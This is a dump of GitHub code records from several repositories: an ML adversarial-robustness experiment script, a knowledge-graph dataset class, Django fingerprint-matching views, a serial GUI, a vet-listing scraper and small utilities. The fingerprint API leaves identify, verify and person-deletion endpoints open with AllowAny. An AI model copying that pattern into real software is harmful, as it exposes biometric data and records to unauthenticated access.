Breakdown\"),\n dbc.Row([\n dcc.Graph(id=\"status-chart\", figure=fig3, style=dict(width=\"100%\")),\n ]),\n dbc.Row([\n dcc.Graph(id=\"tag-chart\", figure=fig1),\n dcc.Graph(id=\"language-chart\", figure=fig2)\n ], justify=\"center\")\n ], align=\"start\"),\n],\n fluid=True\n)\n","repo_name":"terryluzj/cs-information-visualization-assignments-python","sub_path":"routes/codechef/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39672950199","text":"import os, sys, datetime, time\nfrom comet_ml import Experiment\n\nimport argparse\n\nfrom learning.dataloader import get_loader, get_info\nfrom experiments.attacks import load_model, init_comet, abbrev_to_task, TASKONOMY_DATASET\nfrom models.mtask_losses import get_losses_and_tasks\nfrom utils.art.attacks.pytorch_mtask import mtask_forone_advacc\n\n\nparser = argparse.ArgumentParser(description='Run Adversarial attacks experiments')\nparser.add_argument('--arch', type=str, default=\"resnet18\")\nparser.add_argument('--dataset', type=str, default=\"taskonomy\")\nparser.add_argument('--model_root', type=str, default=None)\nparser.add_argument('--data_dir', type=str, default=TASKONOMY_DATASET)\nparser.add_argument('--train_task_set', default=\"ds\")\nparser.add_argument('--aux_task_set', default=\"\")\nparser.add_argument('--test_task_set', default=\"\")\nparser.add_argument('--target_task_set', default=\"\")\nparser.add_argument('--step_size', type=int, default=2)\nparser.add_argument('--epoch', type=str, default=\"150\")\nparser.add_argument('--test_batch_size',type=int, default=32)\nparser.add_argument('--classes',type=int, default=18)\nparser.add_argument('--epsilon',type=int, default=16)\nparser.add_argument('--workers',type=int, default=8)\nparser.add_argument('--pixel_scale',type=int, default=255)\nparser.add_argument('--steps', type=int, default=25)\nparser.add_argument('--debug', action='store_true')\nparser.add_argument('--timestamp', type=str, default=None)\nparser.add_argument('--strategy', type=str, default=\"None\")\nparser.add_argument('--name', type=str, default=\"robust-mtl-RQ2_2\")\nparser.add_argument('--norm', type=str, default=\"Linf\")\nparser.add_argument('--metrics', type=str, default=\"vuln\")\nparser.add_argument('--store_examples', type=int, default=0)\nargs = parser.parse_args()\n\ndefault_model_root = os.path.join(\".\",\"output\",args.dataset,\n \"train_{arch}_{dataset}_2021-01-20_19-18-12_9b01b470_trainset_{train}{aux}_testset_{test}_lambda_0.01_seed_42_lrs_120_140\")\nargs.model_root = default_model_root if args.model_root is None else args.model_root\nargs.timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d_%H-%M-%S')\n\ndef run(args):\n\n args_dict = args.__dict__\n for a in args_dict.keys():\n val = args_dict.get(a)\n if isinstance(val,str):\n setattr(args,a,val.replace(\"\\r\", \"\"))\n\n experiment = init_comet(args,project_name=args.name) if args.name != \"#\" else None\n\n args.train_task_set, args.target_task_set, args.test_task_set, args.aux_task_set = \\\n abbrev_to_task(args.train_task_set), abbrev_to_task(args.target_task_set), abbrev_to_task(args.test_task_set), \\\n abbrev_to_task(args.aux_task_set)\n\n\n model = load_model(args)\n args.task_set = args.test_task_set\n target_task = args.target_task_set\n\n val_loader = get_loader(args, \"val\", out_name=True)\n criteria, tasks = get_losses_and_tasks(args)\n info = get_info(args.dataset)\n\n\n dict_losses2 = mtask_forone_advacc(val_loader, model, criteria, target_task, args, info, test_vis=True,\n norm=args.norm,comet=experiment)\n\n\n\nif __name__ == '__main__':\n\n if len(args.train_task_set) == 0:\n exit()\n\n if len(args.test_task_set) == 0:\n args.test_task_set = args.train_task_set\n\n if len(args.target_task_set) == 0:\n args.target_task_set = args.train_task_set\n\n if args.test_task_set.find(\"+\") >-1:\n args.train_task_set = args.train_task_set.split(\"+\")\n args.test_task_set = args.test_task_set.split(\"+\")\n 
args.target_task_set = args.target_task_set.split(\"+\")\n\n train_task_set, target_task_set, test_task_set = args.train_task_set, args.target_task_set, args.test_task_set\n print(len(train_task_set),len(target_task_set),len(test_task_set))\n\n last_failed = False\n for i, (train, target, test) in enumerate(zip(train_task_set, target_task_set, test_task_set)):\n print(\"### {i}/{l}: attacking {target} with model trained on {train}\".format(train=train,target=target,i=i,\n l=len(train_task_set)))\n args.train_task_set, args.target_task_set, args.test_task_set = train, target, test\n\n try:\n run(args)\n last_failed = False\n except Exception as e:\n if last_failed:\n print(i,\":\",e)\n raise e\n else:\n last_failed = True\n print(i,\":\",e)\n\n\n else:\n run(args)\n\n\n","repo_name":"yamizi/taskaugment","sub_path":"MTVulnerability/experiments/attacks/adv_attack.py","file_name":"adv_attack.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"}
+{"seq_id":"1514595491","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/29 8:49 下午\n# @Author : HuangSir\n# @FileName: api.py\n# @Software: PyCharm\n# @Desc:\n\nfrom .routers import risk_router_init\nfrom fastapi import FastAPI\n\n\ndef create_app():\n app = FastAPI(title='风险评分模型',\n description=\"\"\"标准评分卡,集成树模型同时调,入参类别变量务必根据枚举值输入,否则报错. \\n\n 标准评分卡模型参数规范详情: lrData\\n\n 集成树模型参数规范详情: lgbData\n \"\"\",\n version='3.0')\n risk_router_init(app)\n return app\n","repo_name":"OverseasWork/ml_api_template","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"10905304727","text":"import copy\nfrom collections import defaultdict\nimport numpy\nfrom dataset import Dataset\n\nclass KelpieDataset(Dataset):\n \"\"\"\n Since Datasets handle the correspondence between textual entities and ids,\n the KelpieDataset has the responsibility to decide the id of the kelpie entity (aka mimic in our paper)\n and to store the train, valid and test samples specific for the original entity and for the kelpie entity\n\n A KelpieDataset is never *loaded* from file: it is always generated from a pre-existing, already loaded Dataset.\n\n Nomenclature used in the KelpieDataset:\n - \"original entity\": the entity to explain the prediction of in the original Dataset;\n - \"clone entity\": a homologous mimic, i.e., a \"fake\" entity\n post-trained with the same training samples as the original entity\n - \"kelpie entity\": a non-homologous mimic, i.e., a \"fake\" entity\n post-trained with slightly different training samples from the original entity.\n (e.g. some training samples may have been removed, or added).\n \"\"\"\n\n def __init__(self,\n dataset: Dataset,\n entity_id: int):\n\n super(KelpieDataset, self).__init__(name=dataset.name,\n separator=dataset.separator,\n load=False)\n\n if dataset.num_entities == -1:\n raise Exception(\"The Dataset passed to initialize a KelpieDataset must be already loaded\")\n\n # the KelpieDataset is now basically empty (because load=False was used in the super constructor)\n # so we must manually copy (and sometimes update) all the important attributes from the original loaded Dataset\n self.num_entities = dataset.num_entities + 1 # adding the Kelpie entity to the count\n self.num_relations = dataset.num_relations\n self.num_direct_relations = dataset.num_direct_relations\n\n # copy relevant data structures\n self.to_filter = copy.deepcopy(dataset.to_filter)\n self.train_to_filter = copy.deepcopy(dataset.train_to_filter)\n self.entity_name_2_id = copy.deepcopy(dataset.entity_name_2_id)\n self.entity_id_2_name = copy.deepcopy(dataset.entity_id_2_name)\n self.relation_name_2_id = copy.deepcopy(dataset.relation_name_2_id)\n self.relation_id_2_name = copy.deepcopy(dataset.relation_id_2_name)\n\n # add the kelpie entity\n self.original_entity_id = entity_id\n self.original_entity_name = self.entity_id_2_name[self.original_entity_id]\n self.kelpie_entity_id = dataset.num_entities # add the kelpie entity to the dataset; it is always the last one\n self.kelpie_entity_name = \"kelpie_\" + self.original_entity_name\n self.entity_name_2_id[self.kelpie_entity_name] = self.kelpie_entity_id\n self.entity_id_2_name[self.kelpie_entity_id] = self.kelpie_entity_name\n\n # We do not copy all the triples and samples from the original dataset: the KelpieDataset DOES NOT NEED THEM.\n # The train, valid, and test samples of the KelpieDataset are generated using only those that featured the original entity!\n self.original_train_samples = self._extract_samples_with_entity(dataset.train_samples, self.original_entity_id)\n self.original_valid_samples = self._extract_samples_with_entity(dataset.valid_samples, self.original_entity_id)\n self.original_test_samples = self._extract_samples_with_entity(dataset.test_samples, self.original_entity_id)\n\n self.kelpie_train_samples = Dataset.replace_entity_in_samples(self.original_train_samples, self.original_entity_id, self.kelpie_entity_id)\n self.kelpie_valid_samples = Dataset.replace_entity_in_samples(self.original_valid_samples, self.original_entity_id, self.kelpie_entity_id)\n 
self.kelpie_test_samples = Dataset.replace_entity_in_samples(self.original_test_samples, self.original_entity_id, self.kelpie_entity_id)\n\n # update to_filter and train_to_filter data structures\n samples_to_stack = [self.kelpie_train_samples]\n if len(self.kelpie_valid_samples) > 0:\n samples_to_stack.append(self.kelpie_valid_samples)\n if len(self.kelpie_test_samples) > 0:\n samples_to_stack.append(self.kelpie_test_samples)\n all_kelpie_samples = numpy.vstack(samples_to_stack)\n for i in range(all_kelpie_samples.shape[0]):\n (head_id, relation_id, tail_id) = all_kelpie_samples[i]\n self.to_filter[(head_id, relation_id)].append(tail_id)\n self.to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n # if the sample was a training sample, also do the same for the train_to_filter data structure;\n # Also fill the entity_2_degree and relation_2_degree dicts.\n if i < len(self.kelpie_train_samples):\n self.train_to_filter[(head_id, relation_id)].append(tail_id)\n self.train_to_filter[(tail_id, relation_id + self.num_direct_relations)].append(head_id)\n\n # create a map that associates each kelpie train_sample to its index in self.kelpie_train_samples\n # this will be necessary to allow efficient removals and undoing removals\n self.kelpie_train_sample_2_index = {}\n for i in range(len(self.kelpie_train_samples)):\n cur_head, cur_rel, cur_tail = self.kelpie_train_samples[i]\n self.kelpie_train_sample_2_index[(cur_head, cur_rel, cur_tail)] = i\n\n\n # initialize data structures needed in the case of additions and/or removals;\n # these structures are required to undo additions and/or removals\n self.kelpie_train_samples_copy = copy.deepcopy(self.kelpie_train_samples)\n\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n # override\n def add_training_samples(self, samples_to_add: numpy.array):\n \"\"\"\n Add a set of training samples to the training samples of the kelpie entity of this KelpieDataset.\n The samples to add must still feature the original entity id; this method will convert them before addition.\n The KelpieDataset will keep track of the last performed addition so it can be undone if necessary\n calling the undo_last_training_samples_addition method.\n\n :param samples_to_add: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_add:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_added_samples = samples_to_add\n self.last_added_samples_number = len(samples_to_add)\n\n # reset all data structures needed to undo additions. 
We only want to keep track of the *last* addition.\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n kelpie_samples_to_add = Dataset.replace_entity_in_samples(samples_to_add,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n for (cur_head, cur_rel, cur_tail) in kelpie_samples_to_add:\n self.to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].append(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.last_added_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_additions[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_additions[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n self.kelpie_train_samples = numpy.vstack((self.kelpie_train_samples, numpy.array(kelpie_samples_to_add)))\n\n\n def undo_last_training_samples_addition(self):\n \"\"\"\n This method undoes the last addition performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the additions performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n\n if self.last_added_samples_number <= 0:\n raise Exception(\"No addition to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_additions:\n for x in self.last_filter_additions[key]:\n self.to_filter[key].remove(x)\n self.train_to_filter[key].remove(x)\n\n # reset the data structures used to undo additions\n self.last_added_samples = []\n self.last_added_samples_number = 0\n self.last_filter_additions = defaultdict(lambda:[])\n self.last_added_kelpie_samples = []\n\n\n # override\n def remove_training_samples(self, samples_to_remove: numpy.array):\n \"\"\"\n Remove some training samples from the kelpie training samples of this KelpieDataset.\n The samples to remove must still feature the original entity id; this method will convert them before removal.\n The KelpieDataset will keep track of the last performed removal so it can be undone if necessary.\n\n :param samples_to_remove: the samples to add, still featuring the id of the original entity,\n in the form of a numpy array\n \"\"\"\n\n for sample in samples_to_remove:\n assert self.original_entity_id == sample[0] or self.original_entity_id == sample[2]\n\n self.last_removed_samples = samples_to_remove\n self.last_removed_samples_number = len(samples_to_remove)\n\n # reset data structures needed to undo removals. 
We only want to keep track of the *last* removal.\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n kelpie_train_samples_to_remove = Dataset.replace_entity_in_samples(samples=samples_to_remove,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id,\n as_numpy=False)\n\n # update to_filter and train_to_filter\n for (cur_head, cur_rel, cur_tail) in kelpie_train_samples_to_remove:\n self.to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n self.train_to_filter[(cur_head, cur_rel)].remove(cur_tail)\n self.train_to_filter[(cur_tail, cur_rel + self.num_direct_relations)].remove(cur_head)\n\n # and also update the data structures required for undoing the removal\n self.last_removed_kelpie_samples.append((cur_head, cur_rel, cur_tail))\n self.last_filter_removals[(cur_head, cur_rel)].append(cur_tail)\n self.last_filter_removals[(cur_tail, cur_rel + self.num_direct_relations)].append(cur_head)\n\n # get the indices of the samples to remove in the kelpie_train_samples structure\n # and use them to perform the actual removal\n kelpie_train_indices_to_remove = [self.kelpie_train_sample_2_index[x] for x in kelpie_train_samples_to_remove]\n self.kelpie_train_samples = numpy.delete(self.kelpie_train_samples, kelpie_train_indices_to_remove, axis=0)\n\n\n def undo_last_training_samples_removal(self):\n \"\"\"\n This method undoes the last removal performed on this KelpieDataset\n calling its add_training_samples method.\n\n The purpose of undoing the removals performed on a pre-existing KelpieDataset,\n instead of creating a new KelpieDataset from scratch, is to improve efficiency.\n \"\"\"\n if self.last_removed_samples_number <= 0:\n raise Exception(\"No removal to undo.\")\n\n # revert the self.kelpie_train_samples to the self.kelpie_train_samples_copy\n self.kelpie_train_samples = copy.deepcopy(self.kelpie_train_samples_copy)\n\n # undo additions to to_filter and train_to_filter\n for key in self.last_filter_removals:\n for x in self.last_filter_removals[key]:\n self.to_filter[key].append(x)\n self.train_to_filter[key].append(x)\n\n # reset the data structures used to undo additions\n self.last_removed_samples = []\n self.last_removed_samples_number = 0\n self.last_filter_removals = defaultdict(lambda:[])\n self.last_removed_kelpie_samples = []\n\n\n def as_kelpie_sample(self, original_sample):\n if not self.original_entity_id in original_sample:\n raise Exception(\"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(original_sample))\n return Dataset.replace_entity_in_sample(sample=original_sample,\n old_entity=self.original_entity_id,\n new_entity=self.kelpie_entity_id)\n\n def as_original_sample(self, kelpie_sample):\n if not self.kelpie_entity_id in kelpie_sample:\n raise Exception(\n \"Could not find the original entity \" + str(self.original_entity_id) + \" in the passed sample \" + str(kelpie_sample))\n return Dataset.replace_entity_in_sample(sample=kelpie_sample,\n old_entity=self.kelpie_entity_id,\n new_entity=self.original_entity_id)\n\n\n ### private utility methods\n @staticmethod\n def _extract_samples_with_entity(samples, entity_id):\n return samples[numpy.where(numpy.logical_or(samples[:, 0] == entity_id, samples[:, 2] == 
entity_id))]","repo_name":"AndRossi/Kelpie","sub_path":"kelpie_dataset.py","file_name":"kelpie_dataset.py","file_ext":"py","file_size_in_byte":14658,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"66"}
+{"seq_id":"22908961665","text":"from django.db.models import Q\nfrom drf_spectacular.utils import extend_schema_view, extend_schema\nfrom rest_framework import status\nfrom rest_framework.exceptions import ParseError\nfrom rest_framework.generics import DestroyAPIView, GenericAPIView, \\\n get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom fingerprints.models.enrollment import Finger\nfrom fingerprints.serializers.api.identification import FingerDetailSerializer, \\\n FingerIdentifySerializer, FingerVerifySerializer\nfrom fingerprints.tools.board_sync import BoardSyncService\n\nfrom fingerprints.tools.matcher.identification import FingerMatcher\nfrom persons.models import Person\n\n\n@extend_schema_view(\n post=extend_schema(summary='Identify', tags=['Fingerprints: Identification']),\n)\nclass FingerIdentifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerIdentifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n templates = Finger.get_template_values(status_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not identified.'\n )\n if response == 0:\n qs = Finger.objects.filter(\n iso_fmr_data=templates[template_index.value],\n )\n instance = qs.first()\n serializer = FingerDetailSerializer(instance).data\n return Response(serializer, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n@extend_schema_view(\n post=extend_schema(summary='Verify', tags=['Fingerprints: Identification']),\n)\nclass FingerVerifyView(GenericAPIView):\n permission_classes = [AllowAny]\n serializer_class = FingerVerifySerializer\n queryset = Finger.objects.all()\n\n def post(self, request, *args, **kwargs):\n template = request.data.get('template')\n status_data = request.data.get('status')\n board_id_data = request.data.get('board_id')\n templates = Finger.get_template_values(status_data, board_id_data)\n response, template_index = FingerMatcher().identify(\n template,\n templates\n )\n if template_index.value == -1:\n raise ParseError(\n 'Not verified.'\n )\n if response == 0:\n return Response({'detail': 'Verified'}, status=status.HTTP_200_OK)\n return Response(status.HTTP_400_BAD_REQUEST)\n\n\n#\n@extend_schema_view(\n delete=extend_schema(summary='Destroy', tags=['Fingerprints: Identification']),\n)\nclass PersonDestroyView(DestroyAPIView):\n permission_classes = [AllowAny]\n queryset = Person.objects.all()\n serializer_class = None\n\n def get_object(self):\n instance = get_object_or_404(\n Person,\n Q(\n status=self.request.data.get('status'),\n board_id=self.request.data.get('board_id'),\n )\n )\n return instance\n\n def destroy(self, request, *args, **kwargs):\n instance = self.get_object()\n BoardSyncService().destroy_in_board(instance)\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"mr-Marshanskiy/suprema_fingerprint_matcher","sub_path":"fingerprints/views/identification.py","file_name":"identification.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40351319713","text":"import PyQt5\nimport PyQt5.QtGui\nfrom PyQt5.QtGui import QIcon\nimport pyqtgraph\nfrom pyqtgraph import PlotWidget\nfrom PyQt5 import QtWidgets, uic\nimport sys\nimport serial.tools.list_ports\nimport time\nimport serial\nfrom PyQt5.QtSerialPort import QSerialPort, QSerialPortInfo\nfrom PyQt5.QtCore import QIODevice\n\nimport os ,sys \n\nbasedir = os.path.dirname(__file__)\ntry:\n from ctypes import windll # Only exists on Windows.\n myappid = 'mycompany.myproduct.subproduct.version'\n windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\nexcept ImportError:\n pass\n\n\napp = QtWidgets.QApplication([])\nui = uic.loadUi(os.path.join(basedir,'Casper_v2.ui'))\nui.setWindowTitle(\"Casper Test GUI\")\n\n\nserial = QSerialPort()\nserial.setBaudRate(115200)\nportList = []\nports = QSerialPortInfo().availablePorts()\nfor port in ports:\n portList.append(port.portName())\nui.comboBox_3.addItems(portList)\nui.comboBox_4.addItems(portList)\n\n\nui.widget_1.setLabel('bottom', 'Time (S) ')\nui.widget_1.setLabel('left', 'Temp (C)')\n\n\n\npressure = list()\ngtime = list()\ni = 0\n\ndef onRead():\n global i\n if not serial.canReadLine(): return \n rx = serial.readLine()\n rxs = str(rx, 'utf-8').strip()\n gtime.append(i)\n pressure.append(float(rxs))\n i = i+1\n ui.label_162.setText(rxs)\n ui.widget_1.plot(gtime, pressure)\n \n \n \n \n\ndef Open_Button():\n serial.setPortName(ui.comboBox_3.currentText())\n serial.setPortName(ui.comboBox_4.currentText())\n serial.open(QIODevice.ReadWrite)\ndef Close_Button():\n serial.close()\n\n\n\nserial.readyRead.connect(onRead)\nui.pushButton_6.clicked.connect(Open_Button)\nui.pushButton_5.clicked.connect(Close_Button)\nui.pushButton_8.clicked.connect(Open_Button)\nui.pushButton_7.clicked.connect(Close_Button)\n\n\n\n\nui.setWindowIcon(QIcon(os.path.join(basedir,\"Screenshot_20210202-191737_Video_Player.ico\")))\nui.show()\napp.exec()","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/GroundStation/Casper_v2.py","file_name":"Casper_v2.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"41921104320","text":"N = int(input())\nlst = list(map(int, input().split()))\ncost = [0] + lst\n\ndp = [0] * (N+1)\ndp[1] = cost[1]\n\nfor i in range(2, N+1):\n for j in range(0, i+1):\n dp[i] = max(dp[i], cost[i-j]+dp[j])\n\nprint(dp[N])","repo_name":"20SKKUAlgo/BAEKJOON","sub_path":"JooEun/23Feb/0228/p11052.py","file_name":"p11052.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"39683842016","text":"from __future__ import annotations\n\nimport argparse\nfrom typing import Sequence\n\nfrom all_repos import autofix_lib\nfrom all_repos.config import Config\n\n\ndef find_repos(_: Config) -> list[str]:\n raise AssertionError('--repos is required')\n\n\ndef main(argv: Sequence[str] | None = None) -> int:\n parser = argparse.ArgumentParser(\n description='Interactively apply a manual change across repos.',\n usage='%(prog)s [options]',\n )\n autofix_lib.add_fixer_args(parser)\n parser.add_argument(\n '--branch-name', default='all-repos-manual',\n help='override the autofixer branch name (default `%(default)s`).',\n )\n parser.add_argument(\n '--commit-msg', '--commit-message', required=True,\n help='set the autofixer commit message.',\n )\n args = parser.parse_args(argv)\n\n # force interactive\n args.interactive = True\n\n repos, config, commit, autofix_settings = autofix_lib.from_cli(\n args,\n find_repos=find_repos,\n msg=args.commit_msg,\n branch_name=args.branch_name,\n )\n\n autofix_lib.fix(\n repos,\n apply_fix=autofix_lib.shell,\n config=config,\n commit=commit,\n autofix_settings=autofix_settings,\n )\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","repo_name":"asottile/all-repos","sub_path":"all_repos/manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":483,"dataset":"github-code","pt":"66"}
+{"seq_id":"10033341225","text":"# файл, позволяющий работать с config.json\r\nimport json\r\n\r\n\r\nclass Config:\r\n def __init__(self):\r\n self.file = \"config.json\"\r\n configFile = open(self.file, \"r\")\r\n self.config = json.load(configFile)\r\n configFile.close()\r\n\r\n def getConfigVar(self, variable):\r\n if variable in self.config.keys():\r\n return self.config[variable]\r\n\r\n def setConfigVar(self, variable, arg):\r\n if variable in self.config.keys():\r\n self.config[variable] = arg\r\n with open(self.file, 'w') as config:\r\n config.write(json.dumps(self.config, separators=(',\\n', ': ')))\r\n","repo_name":"Dan4oby/Modular-ABot","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"4417729569","text":"from typing import Optional\nfrom validation.validate import required_keys_present, values_correct_type\n\n\ndef validate(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals post request\n is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n {\n \"comment\": \"here is a comment\",\n \"patientId\": \"123\",\n \"referralHealthFacilityName\": \"H0000\",\n }\n :return: An error message if request body in invalid in some way. None otherwise.\n \"\"\"\n error_message = None\n\n error_message = required_keys_present(\n request_body,\n [\n \"patientId\",\n \"referralHealthFacilityName\",\n ],\n )\n\n if error_message is not None:\n return error_message\n\n all_fields = [\n \"id\",\n \"dateReferred\",\n \"actionTaken\",\n \"isAssessed\",\n \"isCancelled\",\n \"cancelReason\",\n \"notAttended\",\n \"notAttendReason\",\n \"lastEdited\",\n \"userId\",\n \"comment\",\n \"patientId\",\n \"referralHealthFacilityName\",\n ]\n\n for key in request_body:\n if key not in all_fields:\n return \"The key '\" + key + \"' is not a valid field or is set server-side\"\n\n return error_message\n\n\ndef validate_cancel_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/cancel-status-switch/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. None otherwise.\n \"\"\"\n record_keys = [\"isCancelled\", \"cancelReason\"]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"isCancelled\"], bool)\n if error:\n return error\n\n error = values_correct_type(request_body, [\"cancelReason\"], str)\n if error:\n return error\n\n\ndef validate_not_attend_put_request(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/referrals/not-attend/ PUT\n request is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n\n :return: An error message if request body is invalid in some way. None otherwise.\n \"\"\"\n record_keys = [\n \"notAttendReason\",\n ]\n\n for key in request_body:\n if key not in record_keys:\n return f\"{key} is not a valid key in referral request.\"\n else:\n record_keys.remove(key)\n\n if len(record_keys) > 0:\n return f\"There are missing fields for the request body.\"\n\n error = values_correct_type(request_body, [\"notAttendReason\"], str)\n if error:\n return error\n","repo_name":"drbfraser/CRADLE-Platform","sub_path":"server/validation/referrals.py","file_name":"referrals.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"}
+{"seq_id":"23698578882","text":"import csv\r\nimport threading\r\nimport time\r\nfrom dataclasses import dataclass, astuple, fields\r\n\r\n\r\nimport requests\r\n\r\nBASE_URL = \"https://www.zooplus.de/tierarzt/results\"\r\n\r\nOUTPUT_CSV_PATH = \"doctors.csv\"\r\n\r\n\r\n@dataclass\r\nclass Doctor:\r\n full_name: str\r\n clinic: str\r\n open_time: str\r\n address: str\r\n rating: int\r\n num_of_reviews: int\r\n\r\n\r\nDOCTORS_FIELDS = [field.name for field in fields(Doctor)]\r\n\r\n\r\ndef parse_one_doctor(doctor) -> Doctor:\r\n return Doctor(\r\n full_name=doctor[\"name\"],\r\n clinic=doctor[\"subtitle\"]\r\n if \"subtitle\" in doctor\r\n else \"sorry, we don't have this information\",\r\n open_time=doctor[\"open_time\"],\r\n address=doctor[\"address\"],\r\n rating=doctor[\"avg_review_score\"],\r\n num_of_reviews=doctor[\"count_reviews\"],\r\n )\r\n\r\n\r\ntoken = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/token?debug=authReduxMiddleware-tokenIsExpired\"\r\n).json()[\"token\"]\r\nheaders = {\"authorization\": f\"Bearer {token}\"}\r\n\r\n\r\ndef get_doctors(num):\r\n all_doctors = []\r\n attribute_from = 0\r\n attribute_page = 1\r\n\r\n page = requests.get(\r\n \"https://www.zooplus.de/tierarzt/api/v2/results\",\r\n params={\r\n \"animal_99\": True,\r\n \"page\": {attribute_page},\r\n \"from\": {attribute_from},\r\n \"size\": 20,\r\n },\r\n headers=headers,\r\n )\r\n content = page.json()\r\n\r\n attribute_from += 20\r\n all_doctors += [parse_one_doctor(doctor) for doctor in content[\"results\"]]\r\n\r\n with open(OUTPUT_CSV_PATH, \"w\", encoding=\"utf-8\") as file:\r\n writer = csv.writer(file)\r\n writer.writerow(DOCTORS_FIELDS)\r\n writer.writerows([astuple(doctor) for doctor in all_doctors])\r\n\r\n\r\ndef main_threads():\r\n tasks = []\r\n\r\n for num in range(1, 6):\r\n tasks.append(threading.Thread(target=get_doctors, args=(num,)))\r\n tasks[-1].start()\r\n\r\n for task in tasks:\r\n task.join()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start_time = time.perf_counter()\r\n main_threads()\r\n end_time = time.perf_counter()\r\n print(\"Elapsed:\", end_time - start_time)\r\n","repo_name":"anastasia-martyniuk/scraping_zooplus","sub_path":"parse_with_threads.py","file_name":"parse_with_threads.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
